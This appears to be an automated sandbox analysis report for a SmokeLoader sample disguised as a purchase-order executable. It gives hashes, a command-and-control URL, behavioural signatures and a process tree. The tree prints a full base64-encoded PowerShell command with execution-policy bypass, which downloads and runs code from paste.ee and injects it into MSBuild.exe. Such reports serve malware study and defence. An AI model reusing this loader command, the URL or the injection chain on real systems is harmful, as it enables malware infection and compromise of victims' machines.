Analysis
-
max time kernel
44s -
max time network
123s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
14-08-2020 08:27
Static task
static1
Behavioral task
behavioral1
Sample
Purchase Order 21PTAES2110-2.pif.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
Purchase Order 21PTAES2110-2.pif.exe
Resource
win10
General
-
Target
Purchase Order 21PTAES2110-2.pif.exe
-
Size
173KB
-
MD5
12f34f9b5d3817801893ee1aad6a5ef3
-
SHA1
d0e8e93451aaea3571419169e5fd73a5f2a31cc2
-
SHA256
966c1a5412af27dde07c13cbb17b743eec085d16aeac60849af71d376d1452ac
-
SHA512
5fd48762f0c164f3a38530cf98655d3151ccac4c3d7abad4e02285bb8946817356b10d1e30c052d6f0012a85ed8257f413aaff3397877d3dc36b9bb7f8a2d606
Malware Config
Extracted
smokeloader
2018
http://5by80.com/1/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 1888 powershell.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
MSBuild.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum MSBuild.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 MSBuild.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1888 set thread context of 2020 1888 powershell.exe MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1888 powershell.exe 1888 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
MSBuild.exepid process 2020 MSBuild.exe 2020 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Purchase Order 21PTAES2110-2.pif.exepowershell.exedescription pid process Token: SeDebugPrivilege 1516 Purchase Order 21PTAES2110-2.pif.exe Token: SeDebugPrivilege 1888 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
Purchase Order 21PTAES2110-2.pif.exepowershell.exedescription pid process target process PID 1516 wrote to memory of 1888 1516 Purchase Order 21PTAES2110-2.pif.exe powershell.exe PID 1516 wrote to memory of 1888 1516 Purchase Order 21PTAES2110-2.pif.exe powershell.exe PID 1516 wrote to memory of 1888 1516 Purchase Order 21PTAES2110-2.pif.exe powershell.exe PID 1516 wrote to memory of 1888 1516 Purchase Order 21PTAES2110-2.pif.exe powershell.exe PID 1888 wrote to memory of 2020 1888 powershell.exe MSBuild.exe PID 1888 wrote to memory of 2020 1888 powershell.exe MSBuild.exe PID 1888 wrote to memory of 2020 1888 powershell.exe MSBuild.exe PID 1888 wrote to memory of 2020 1888 powershell.exe MSBuild.exe PID 1888 wrote to memory of 2020 1888 powershell.exe MSBuild.exe PID 1888 wrote to memory of 2020 1888 powershell.exe MSBuild.exe PID 1888 wrote to memory of 2020 1888 powershell.exe MSBuild.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Purchase Order 21PTAES2110-2.pif.exe"C:\Users\Admin\AppData\Local\Temp\Purchase Order 21PTAES2110-2.pif.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AVwBhAHkAdQBXACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAF4AIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAKgAiACwAIAAiADQAOAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAjACIALAAgACIANwA4ACIAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBZAFQAaQBGAFIAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAQwAuAE0AXQA6ADoAUgAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA=2⤵
- Blacklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
PID:2020